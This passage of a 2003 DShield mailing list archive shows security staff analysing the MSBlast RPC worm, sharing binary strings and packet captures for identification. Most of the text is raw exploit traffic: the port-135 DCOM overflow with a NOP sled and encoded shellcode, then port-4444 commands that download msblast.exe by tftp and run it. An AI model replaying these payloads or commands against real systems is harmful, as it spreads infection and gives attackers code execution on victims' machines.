0530 BE 32 94 7F E9 2A C4 D0 EF 62 D4 D0 FF 62 6B D6
.2..*...b...bk.
0540 A3 B9 4C D7 E8 5A 96 80 AE 6E 1F 4C D5 24 C5 D3
..L..Z...n.L.$..
0550 40 64 B4 D7 EC CD C2 A4 E8 63 C7 7F E9 1A 1F 50
@d.......c....P
0560 D7 57 EC E5 BF 5A F7 ED DB 1C 1D E6 8F B1 78 D4
.W...Z........x.
0570 32 0E B0 B3 7F 01 5D 03 7E 27 3F 62 42 F4 D0 A4
2....].~'?bB...
0580 AF 76 6A C4 9B 0F 1D D4 9B 7A 1D D4 9B 7E 1D D4
.vj......z...~..
0590 9B 62 19 C4 9B 22 C0 D0 EE 63 C5 EA BE 63 C5 7F
.b..."...c...c.

05A0 C9 02 C5 7F E9 22 1F 4C D5 CD 6B B1 40 64 98 0B
....".L..k. at d..
05B0 77 65 6B D6 93 CD C2 94 EA 64 F0 21 8F 32 94 80
wek......d.!.2..
05C0 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B D7 3A 7F 89
:...4r....9..:.
05D0 34 72 A0 0B 17 8A 94 80 BF B9 51 DE E2 F0 90 80
4r........Q.....
05E0 EC 67 C2 D7 34 5E B0 98 34 77 A8 0B EB 37 EC 83
.g..4^..4w...7..
05F0 6A B9 DE 98 34 68 B4 83 62 D1 A6 C9 34 06 1F 83
j...4h..b...4...
0600 4A 01 6B 7C 8C F2 38 BA 7B 46 93 41 70 3F 97 78
J.k|..8.{F.Ap?.x
0610 54 C0 AF FC 9B 26 E1 61 34 68 B0 83 62 54 1F 8C
T....&.a4h..bT..
0620 F4 B9 CE 9C BC EF 1F 84 34 31 51 6B BD 01 54 0B
........41Qk..T.
0630 6A 6D CA DD E4 F0 90 80 2F A2 04 00 5C 00 43 00
jm....../...\.C.
0640 24 00 5C 00 31 00 32 00 33 00 34 00 35 00 36 00
$.\.1.2.3.4.5.6.
0650 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00
1.1.1.1.1.1.1.1.
0660 31 00 31 00 31 00 31 00 31 00 31 00 31 00 2E 00
1.1.1.1.1.1.1...
0670 64 00 6F 00 63 00 00 00 01 10 08 00 CC CC CC CC
d.o.c...........
0680 20 00 00 00 30 00 2D 00 00 00 00 00 88 2A 0C 00
...0.-......*..
0690 02 00 00 00 01 00 00 00 28 8C 0C 00 01 00 00 00
........(.......
06A0 07 00 00 00 00 00 00 00 ........

65.33.159.235 : 1040 TCP Disconnected ID = 6
--- 8/10/03 18:38:33.400
Status Code: 0 OK



----- Original Message ----- 
From: "Chris Ream" 
To: "'General DShield Discussion List'" 

Sent: Monday, August 11, 2003 3:01 PM
Subject: RE: [Dshield] infocon: yellow


> Has anyone captured the packet stream? I've got some sensors listening
> but have not yet seen it. I would like to reconstruct it and
disassemble
> it to find out exactly what it's doing.
>
> If anyone has captured it and is willing to share it I would greatly
> appreciate it.
>
> Chris Ream
> Synaptek Network Security.
>
>
> -----Original Message-----
> From: list-bounces at dshield.org [mailto:list-bounces at dshield.org] On
> Behalf Of Andy Hopkins
> Sent: Monday, August 11, 2003 2:28 PM
> To: 'General DShield Discussion List'
> Subject: RE: [Dshield] infocon: yellow
>
> FYI: Its started here in NZ at 02:30 local time
>
> ------------------------------------------
> Andy Hopkins
> Senior Unix & Firewall Administrator
> healthAlliance
>
> (+64) (9) 486 8944
> (+64) (25) 285 2139
>
> Disclaimer:
> The views and information expressed in this e-Mail are actually mine,
> because my partner says so!
> healthAlliance doesn't necessarily agree with me either
>
>
>
> -----Original Message-----
> From: Johannes B. Ullrich [mailto:jullrich at sans.org]
> Sent: Tuesday, 12 August 2003 06:24
> To: list at dshield.org
> Subject: [Dshield] infocon: yellow
>
>
> This message was converted from multipart/signed to ascii armored
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Content-Type: text/plain
> Content-Transfer-Encoding: quoted-printable
>
> We just got a binary that looks very much like an
> RPC worm. It scans for port 135. No real idea what it does (other than
> scanning).
>
> Strings from the file:
>
> msblast.exe
> I just want to say LOVE YOU SAN!!
> billy gates why do you make this possible ?
> Stop making money and fix your software
> windowsupdate.com
>
> BILLY
> windows auto update
> SOFTWARE\Microsoft\Windows\CurrentVersion\Run
> tftp -i %s GET %s
>
>
>
>
> -- 
> SANS - Internet Storm Center
> http://isc.sans.org
> PGP Key: http://isc.sans.org/jullrich.txt
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.1 (GNU/Linux)
>
> iD8DBQA/N99UR1p7hYJvB/wRAgmhAJ4xk51nJk53JB9o6tiTvPtIe+V3tACghYLN
> FulyEetb4Gu8+9fysZN+ajg-----END PGP SIGNATURE-----
>
> --
> SHA1
> _______________________________________________
> list mailing list
> list at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list
> _______________________________________________
> list mailing list
> list at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list
>
> _______________________________________________
> list mailing list
> list at dshield.org
> To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list

_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list



> ATTACHMENT part 3.19 message/rfc822 
Date: Mon, 11 Aug 2003 16:26:09 -0600
From: Blake McNeill 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <01bb01c36057$90b8d780$07a8a8c0 at delphi>
References: <000701c3604b$ae7c6ef0$468d11d8 at CLR>
<200308111738.12075.jonathan at xcorps.net>
Content-Type: text/plain; charset=iso-8859-1
MIME-Version: 1.0
Content-Transfer-Encoding: 7BIT
Precedence: list
Reply-to: General DShield Discussion List 

Message: 19

Are you sure this is the worm as its the same as my capture from last night,
but there are some people saying that this is just the xfocus/metasploit
scan (which I disagree with), as I have gotten far too many of these since
then to be anything other then the worm.

Blake

----- Original Message ----- 
From: "Jonathan Rickman" 
To: "General DShield Discussion List" 

Sent: Monday, August 11, 2003 3:38 PM
Subject: Re: [Dshield] infocon: yellow


> On Monday 11 August 2003 17:01, Chris Ream wrote:
> > Has anyone captured the packet stream? I've got some sensors listening
> > but have not yet seen it. I would like to reconstruct it and disassemble
> > it to find out exactly what it's doing.
> >
> > If anyone has captured it and is willing to share it I would greatly
> > appreciate it.
>
> Hex dump from netcat attached.
>
> -- 
> Jonathan Rickman
> X Corps Security
> http://www.xcorps.net
>
>


----------------------------------------------------------------------------
----


> _______________________________________________
> list mailing list
> list at dshield.org
> To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
>



> ATTACHMENT part 3.20 message/rfc822 
Date: Mon, 11 Aug 2003 18:40:22 -0400
From: Jonathan Rickman 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <200308111840.22843.jonathan at xcorps.net>
In-Reply-To: <01bb01c36057$90b8d780$07a8a8c0 at delphi>
References: <000701c3604b$ae7c6ef0$468d11d8 at CLR>
<200308111738.12075.jonathan at xcorps.net>
<01bb01c36057$90b8d780$07a8a8c0 at delphi>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 20

On Monday 11 August 2003 18:26, Blake McNeill wrote:
> Are you sure this is the worm as its the same as my capture from last
> night, but there are some people saying that this is just the
> xfocus/metasploit scan (which I disagree with), as I have gotten far too
> many of these since then to be anything other then the worm.

I confirmed (well, as best I could) that the source was infected immediately 
after capture by scanning 4444 with an nmap tcp connect scan.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net




> ATTACHMENT part 3.21 message/rfc822 
Date: Mon, 11 Aug 2003 16:26:56 -0700
From: John Sage 
To: General DShield Discussion List 

Subject: [Dshield] Re: Pacekt payloads to TCP:135, TCP:4444
Message-ID: <20030811232656.GN24440 at sparky.finchhaven.net>
In-Reply-To: <1060631933.11754.250.camel at bart>
References: <20030811192631.46380.qmail at web20413.mail.yahoo.com>
<1060631933.11754.250.camel at bart>
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Precedence: list
Reply-to: General DShield Discussion List 

Message: 21

On Mon, Aug 11, 2003 at 03:58:53PM -0400, Johannes Ullrich wrote:
> http://johannes.homepc.org/viruszoo/msblast.zip
> please let me know what you find.

Here's a quick snapshot of what one host seems to do:

ngrep_host: src host 12.82.154.207 in snort.log.1060642891
Generated 16:22:28 (TZ -07:00) 08/11/2003

input: snort.log.1060642891
filter: ip and ( src host 12.82.154.207 )
#
T 2003/08/11 16:21:29.473813 12.82.154.207:2406 -> 12.82.140.147:135 [S]
#
T 2003/08/11 16:21:29.723844 12.82.154.207:2406 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:21:31.184005 12.82.154.207:2406 -> 12.82.140.147:135 [AP]
05 00 0b 03 10 00 00 00 48 00 00 00 7f 00 00 00 ........H.......
d0 16 d0 16 00 00 00 00 01 00 00 00 01 00 01 00 ................
a0 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 ...............F
00 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 .....]..........
2b 10 48 60 02 00 00 00 +.H`.... 
#
T 2003/08/11 16:21:31.664210 12.82.154.207:2406 -> 12.82.140.147:135 [A]
05 00 00 03 10 00 00 00 a8 06 00 00 e5 00 00 00 ................
90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
00 00 00 00 32 24 58 fd cc 45 64 49 b0 70 dd ae ....2$X..EdI.p..
74 2c 96 d2 60 5e 0d 00 01 00 00 00 00 00 00 00 t,..`^..........
70 5e 0d 00 02 00 00 00 7c 5e 0d 00 00 00 00 00 p^......|^......
10 00 00 00 80 96 f1 f1 2a 4d ce 11 a6 6a 00 20 ........*M...j. 
af 6e 72 f4 0c 00 00 00 4d 41 52 42 01 00 00 00 .nr.....MARB....
00 00 00 00 0d f0 ad ba 00 00 00 00 a8 f4 0b 00 ................
20 06 00 00 20 06 00 00 4d 45 4f 57 04 00 00 00 ... ...MEOW....
a2 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 ...............F
38 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 8..............F
00 00 00 00 f0 05 00 00 e8 05 00 00 00 00 00 00 ................
01 10 08 00 cc cc cc cc c8 00 00 00 4d 45 4f 57 ............MEOW
e8 05 00 00 d8 00 00 00 00 00 00 00 02 00 00 00 ................
07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 c4 28 cd 00 64 29 cd 00 00 00 00 00 .....(..d)......
07 00 00 00 b9 01 00 00 00 00 00 00 c0 00 00 00 ................
00 00 00 46 ab 01 00 00 00 00 00 00 c0 00 00 00 ...F............
00 00 00 46 a5 01 00 00 00 00 00 00 c0 00 00 00 ...F............
00 00 00 46 a6 01 00 00 00 00 00 00 c0 00 00 00 ...F............
00 00 00 46 a4 01 00 00 00 00 00 00 c0 00 00 00 ...F............
00 00 00 46 ad 01 00 00 00 00 00 00 c0 00 00 00 ...F............
00 00 00 46 aa 01 00 00 00 00 00 00 c0 00 00 00 ...F............
00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 ...F....`...X...
90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 .... at ... ...8...
30 00 00 00 01 00 00 00 01 10 08 00 cc cc cc cc 0...............
50 00 00 00 4f b6 88 20 ff ff ff ff 00 00 00 00 P...O.. ........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 01 10 08 00 cc cc cc cc ................
48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 H.....f.........
c0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 .......F........
00 00 00 00 01 00 00 00 00 00 00 00 78 19 0c 00 ............x...
58 00 00 00 05 00 06 00 01 00 00 00 70 d8 98 93 X...........p...
98 4f d2 11 a9 3d be 57 b2 00 00 00 32 00 31 00 .O...=.W....2.1.
01 10 08 00 cc cc cc cc 80 00 00 00 0d f0 ad ba ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 .C......`...`...
4d 45 4f 57 04 00 00 00 c0 01 00 00 00 00 00 00 MEOW............
c0 00 00 00 00 00 00 46 3b 03 00 00 00 00 00 00 .......F;.......
c0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 .......F....0...
01 00 01 00 81 c5 17 03 80 0e e9 4a 99 99 f1 8a ...........J....
50 6f 7a 85 02 00 00 00 00 00 00 00 00 00 00 00 Poz.............
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
01 10 08 00 cc cc cc cc 30 00 00 00 78 00 6e 00 ........0...x.n.
00 00 00 00 d8 da 0d 00 00 00 00 00 00 00 00 00 ................
20 2f 0c 00 00 00 00 00 00 00 00 00 03 00 00 00 /..............
00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 ........F.X.....
01 10 08 00 cc cc cc cc 10 00 00 00 30 00 2e 00 ............0...
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01 10 08 00 cc cc cc cc 68 00 00 00 0e 00 ff ff ........h.......
68 8b 0b 00 02 00 00 00 00 00 00 00 00 00 00 00 h...............
86 01 00 00 00 00 00 00 86 01 00 00 5c 00 5c 00 ............\.\.
46 00 58 00 4e 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
4e 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
46 00 58 00 9d 13 00 01 cc e0 fd 7f cc e0 fd 7f F.X.............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 eb 19 5e 31 c9 81 e9 89 ff .........^1.....
ff ff 81 36 80 bf 32 94 81 ee fc ff ff ff e2 f2 ...6..2.........
eb 05 e8 e2 ff ff ff 03 53 06 1f 74 57 75 95 80 ........S..tWu..
bf bb 92 7f 89 5a 1a ce b1 de 7c e1 be 32 94 09 .....Z....|..2..
f9 3a 6b b6 d7 9f 4d 85 71 da c6 81 bf 32 1d c6 .:k...M.q....2..
b3 5a f8 ec bf 32 fc b3 8d 1c f0 e8 c8 41 a6 df .Z...2.......A..
eb cd c2 88 36 74 90 7f 89 5a e6 7e 0c 24 7c ad ....6t...Z.~.$|.
be 32 94 09 f9 22 6b b6 d7 4c 4c 62 cc da 8a 81 .2..."k..LLb....
bf 32 1d c6 ab cd e2 84 d7 f9 79 7c 84 da 9a 81 .2........y|....
bf 32 1d c6 a7 cd e2 84 d7 eb 9d 75 12 da 6a 80 .2.........u..j.
bf 32 1d c6 a3 cd e2 84 d7 96 8e f0 78 da 7a 80 .2..........x.z.
bf 32 1d c6 9f cd e2 84 d7 96 39 ae 56 da 4a 80 .2........9.V.J.
bf 32 1d c6 9b cd e2 84 d7 d7 dd 06 f6 da 5a 80 .2............Z.
bf 32 1d c6 97 cd e2 84 d7 d5 ed 46 c6 da 2a 80 .2.........F..*.
bf 32 1d c6 93 01 6b 01 53 a2 95 80 bf 66 fc 81 .2....k.S....f..
be 32 94 7f e9 2a c4 d0 ef 62 d4 d0 ff 62 6b d6 .2...*...b...bk.
a3 b9 4c d7 e8 5a 96 80 ae 6e 1f 4c d5 24 c5 d3 ..L..Z...n.L.$..
40 64 b4 d7 ec cd c2 a4 e8 63 c7 7f e9 1a 1f 50 @d.......c.....P
d7 57 ec e5 bf 5a f7 ed db 1c 1d e6 8f b1 78 d4 .W...Z........x.
32 0e b0 b3 7f 01 5d 03 7e 27 3f 62 42 f4 d0 a4 2.....].~'?bB...
af 76 6a c4 9b 0f 1d d4 9b 7a 1d d4 9b 7e 1d d4 .vj......z...~..
9b 62 19 c4 9b 22 c0 d0 ee 63 c5 ea be 63 c5 7f .b..."...c...c..
c9 02 c5 7f e9 22 1f 4c d5 cd 6b b1 40 64 98 0b .....".L..k. at d..
77 65 6b d6 wek. 
#
T 2003/08/11 16:21:31.704100 12.82.154.207:2406 -> 12.82.140.147:135 [AP]
93 cd c2 94 ea 64 f0 21 8f 32 94 80 3a f2 ec 8c .....d.!.2..:...
34 72 98 0b cf 2e 39 0b d7 3a 7f 89 34 72 a0 0b 4r....9..:..4r..
17 8a 94 80 bf b9 51 de e2 f0 90 80 ec 67 c2 d7 ......Q......g..
34 5e b0 98 34 77 a8 0b eb 37 ec 83 6a b9 de 98 4^..4w...7..j...
34 68 b4 83 62 d1 a6 c9 34 06 1f 83 4a 01 6b 7c 4h..b...4...J.k|
8c f2 38 ba 7b 46 93 41 70 3f 97 78 54 c0 af fc ..8.{F.Ap?.xT...
9b 26 e1 61 34 68 b0 83 62 54 1f 8c f4 b9 ce 9c .&.a4h..bT......
bc ef 1f 84 34 31 51 6b bd 01 54 0b 6a 6d ca dd ....41Qk..T.jm..
e4 f0 90 80 2f a2 04 00 5c 00 43 00 24 00 5c 00 ..../...\.C.$.\.
31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 1.2.3.4.5.6.1.1.
31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
31 00 31 00 31 00 31 00 31 00 2e 00 64 00 6f 00 1.1.1.1.1...d.o.
63 00 00 00 01 10 08 00 cc cc cc cc 20 00 00 00 c........... ...
30 00 2d 00 00 00 00 00 88 2a 0c 00 02 00 00 00 0.-......*......
01 00 00 00 28 8c 0c 00 01 00 00 00 07 00 00 00 ....(...........
00 00 00 00 .... 
#
T 2003/08/11 16:21:31.714051 12.82.154.207:2406 -> 12.82.140.147:135 [AF]
#
T 2003/08/11 16:21:31.714092 12.82.154.207:2406 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:21:31.734052 12.82.154.207:2416 -> 12.82.140.147:4444 [S]
#
T 2003/08/11 16:21:32.004072 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:21:32.084084 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
74 66 74 70 20 2d 69 20 31 32 2e 38 32 2e 31 35 tftp -i 12.82.15
34 2e 32 30 37 20 47 45 54 20 6d 73 62 6c 61 73 4.207 GET msblas
74 2e 65 78 65 0a t.exe. 
#
T 2003/08/11 16:21:32.334124 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:21:53.146276 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
73 74 61 72 74 20 6d 73 62 6c 61 73 74 2e 65 78 start msblast.ex
65 0a e. 
exit



And another:

ngrep_host: src host 12.82.141.200 in snort.log.1060642891
Generated 16:25:10 (TZ -07:00) 08/11/2003

input: snort.log.1060642891
filter: ip and ( src host 12.82.141.200 )
#
T 2003/08/11 16:09:47.092158 12.82.141.200:1070 -> 12.82.140.147:135 [S]
#
T 2003/08/11 16:09:47.552244 12.82.141.200:1070 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:09:48.622333 12.82.141.200:1070 -> 12.82.140.147:135 [AP]
05 00 0b 03 10 00 00 00 48 00 00 00 7f 00 00 00 ........H.......
d0 16 d0 16 00 00 00 00 01 00 00 00 01 00 01 00 ................
a0 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 ...............F
00 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 .....]..........
2b 10 48 60 02 00 00 00 +.H`.... 
#
T 2003/08/11 16:09:49.162599 12.82.141.200:1070 -> 12.82.140.147:135 [A]
05 00 00 03 10 00 00 00 a8 06 00 00 e5 00 00 00 ................
90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
00 00 00 00 32 24 58 fd cc 45 64 49 b0 70 dd ae ....2$X..EdI.p..
74 2c 96 d2 60 5e 0d 00 01 00 00 00 00 00 00 00 t,..`^..........
70 5e 0d 00 02 00 00 00 7c 5e 0d 00 00 00 00 00 p^......|^......
10 00 00 00 80 96 f1 f1 2a 4d ce 11 a6 6a 00 20 ........*M...j. 
af 6e 72 f4 0c 00 00 00 4d 41 52 42 01 00 00 00 .nr.....MARB....
00 00 00 00 0d f0 ad ba 00 00 00 00 a8 f4 0b 00 ................
20 06 00 00 20 06 00 00 4d 45 4f 57 04 00 00 00 ... ...MEOW....
a2 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 ...............F
38 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 8..............F
00 00 00 00 f0 05 00 00 e8 05 00 00 00 00 00 00 ................
01 10 08 00 cc cc cc cc c8 00 00 00 4d 45 4f 57 ............MEOW
e8 05 00 00 d8 00 00 00 00 00 00 00 02 00 00 00 ................
07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 c4 28 cd 00 64 29 cd 00 00 00 00 00 .....(..d)......
07 00 00 00 b9 01 00 00 00 00 00 00 c0 00 00 00 ................
00 00 00 46 ab 01 00 00 00 00 00 00 c0 00 00 00 ...F............
00 00 00 46 a5 01 00 00 00 00 00 00 c0 00 00 00 ...F............
00 00 00 46 a6 01 00 00 00 00 00 00 c0 00 00 00 ...F............
00 00 00 46 a4 01 00 00 00 00 00 00 c0 00 00 00 ...F............
00 00 00 46 ad 01 00 00 00 00 00 00 c0 00 00 00 ...F............
00 00 00 46 aa 01 00 00 00 00 00 00 c0 00 00 00 ...F............
00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 ...F....`...X...
90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 .... at ... ...8...
30 00 00 00 01 00 00 00 01 10 08 00 cc cc cc cc 0...............
50 00 00 00 4f b6 88 20 ff ff ff ff 00 00 00 00 P...O.. ........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 01 10 08 00 cc cc cc cc ................
48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 H.....f.........
c0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 .......F........
00 00 00 00 01 00 00 00 00 00 00 00 78 19 0c 00 ............x...
58 00 00 00 05 00 06 00 01 00 00 00 70 d8 98 93 X...........p...
98 4f d2 11 a9 3d be 57 b2 00 00 00 32 00 31 00 .O...=.W....2.1.
01 10 08 00 cc cc cc cc 80 00 00 00 0d f0 ad ba ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 .C......`...`...
4d 45 4f 57 04 00 00 00 c0 01 00 00 00 00 00 00 MEOW............
c0 00 00 00 00 00 00 46 3b 03 00 00 00 00 00 00 .......F;.......
c0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 .......F....0...
01 00 01 00 81 c5 17 03 80 0e e9 4a 99 99 f1 8a ...........J....
50 6f 7a 85 02 00 00 00 00 00 00 00 00 00 00 00 Poz.............
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
01 10 08 00 cc cc cc cc 30 00 00 00 78 00 6e 00 ........0...x.n.
00 00 00 00 d8 da 0d 00 00 00 00 00 00 00 00 00 ................
20 2f 0c 00 00 00 00 00 00 00 00 00 03 00 00 00 /..............
00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 ........F.X.....
01 10 08 00 cc cc cc cc 10 00 00 00 30 00 2e 00 ............0...
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01 10 08 00 cc cc cc cc 68 00 00 00 0e 00 ff ff ........h.......
68 8b 0b 00 02 00 00 00 00 00 00 00 00 00 00 00 h...............
86 01 00 00 00 00 00 00 86 01 00 00 5c 00 5c 00 ............\.\.
46 00 58 00 4e 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
4e 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
46 00 58 00 9f 75 18 00 cc e0 fd 7f cc e0 fd 7f F.X..u..........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 eb 19 5e 31 c9 81 e9 89 ff .........^1.....
ff ff 81 36 80 bf 32 94 81 ee fc ff ff ff e2 f2 ...6..2.........
eb 05 e8 e2 ff ff ff 03 53 06 1f 74 57 75 95 80 ........S..tWu..
bf bb 92 7f 89 5a 1a ce b1 de 7c e1 be 32 94 09 .....Z....|..2..
f9 3a 6b b6 d7 9f 4d 85 71 da c6 81 bf 32 1d c6 .:k...M.q....2..
b3 5a f8 ec bf 32 fc b3 8d 1c f0 e8 c8 41 a6 df .Z...2.......A..
eb cd c2 88 36 74 90 7f 89 5a e6 7e 0c 24 7c ad ....6t...Z.~.$|.
be 32 94 09 f9 22 6b b6 d7 4c 4c 62 cc da 8a 81 .2..."k..LLb....
bf 32 1d c6 ab cd e2 84 d7 f9 79 7c 84 da 9a 81 .2........y|....
bf 32 1d c6 a7 cd e2 84 d7 eb 9d 75 12 da 6a 80 .2.........u..j.
bf 32 1d c6 a3 cd e2 84 d7 96 8e f0 78 da 7a 80 .2..........x.z.
bf 32 1d c6 9f cd e2 84 d7 96 39 ae 56 da 4a 80 .2........9.V.J.
bf 32 1d c6 9b cd e2 84 d7 d7 dd 06 f6 da 5a 80 .2............Z.
bf 32 1d c6 97 cd e2 84 d7 d5 ed 46 c6 da 2a 80 .2.........F..*.
bf 32 1d c6 93 01 6b 01 53 a2 95 80 bf 66 fc 81 .2....k.S....f..
be 32 94 7f e9 2a c4 d0 ef 62 d4 d0 ff 62 6b d6 .2...*...b...bk.
a3 b9 4c d7 e8 5a 96 80 ae 6e 1f 4c d5 24 c5 d3 ..L..Z...n.L.$..
40 64 b4 d7 ec cd c2 a4 e8 63 c7 7f e9 1a 1f 50 @d.......c.....P
d7 57 ec e5 bf 5a f7 ed db 1c 1d e6 8f b1 78 d4 .W...Z........x.
32 0e b0 b3 7f 01 5d 03 7e 27 3f 62 42 f4 d0 a4 2.....].~'?bB...
af 76 6a c4 9b 0f 1d d4 9b 7a 1d d4 9b 7e 1d d4 .vj......z...~..
9b 62 19 c4 9b 22 c0 d0 ee 63 c5 ea be 63 c5 7f .b..."...c...c..
c9 02 c5 7f e9 22 1f 4c d5 cd 6b b1 40 64 98 0b .....".L..k. at d..
77 65 6b d6 wek. 
#
T 2003/08/11 16:09:49.242407 12.82.141.200:1070 -> 12.82.140.147:135 [AP]
93 cd c2 94 ea 64 f0 21 8f 32 94 80 3a f2 ec 8c .....d.!.2..:...
34 72 98 0b cf 2e 39 0b d7 3a 7f 89 34 72 a0 0b 4r....9..:..4r..
17 8a 94 80 bf b9 51 de e2 f0 90 80 ec 67 c2 d7 ......Q......g..
34 5e b0 98 34 77 a8 0b eb 37 ec 83 6a b9 de 98 4^..4w...7..j...
34 68 b4 83 62 d1 a6 c9 34 06 1f 83 4a 01 6b 7c 4h..b...4...J.k|
8c f2 38 ba 7b 46 93 41 70 3f 97 78 54 c0 af fc ..8.{F.Ap?.xT...
9b 26 e1 61 34 68 b0 83 62 54 1f 8c f4 b9 ce 9c .&.a4h..bT......
bc ef 1f 84 34 31 51 6b bd 01 54 0b 6a 6d ca dd ....41Qk..T.jm..
e4 f0 90 80 2f a2 04 00 5c 00 43 00 24 00 5c 00 ..../...\.C.$.\.
31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 1.2.3.4.5.6.1.1.
31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
31 00 31 00 31 00 31 00 31 00 2e 00 64 00 6f 00 1.1.1.1.1...d.o.
63 00 00 00 01 10 08 00 cc cc cc cc 20 00 00 00 c........... ...
30 00 2d 00 00 00 00 00 88 2a 0c 00 02 00 00 00 0.-......*......
01 00 00 00 28 8c 0c 00 01 00 00 00 07 00 00 00 ....(...........
00 00 00 00 .... 
#
T 2003/08/11 16:09:49.252459 12.82.141.200:1070 -> 12.82.140.147:135 [AF]
#
T 2003/08/11 16:09:49.252491 12.82.141.200:1070 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:09:49.262406 12.82.141.200:1080 -> 12.82.140.147:4444 [S]
#
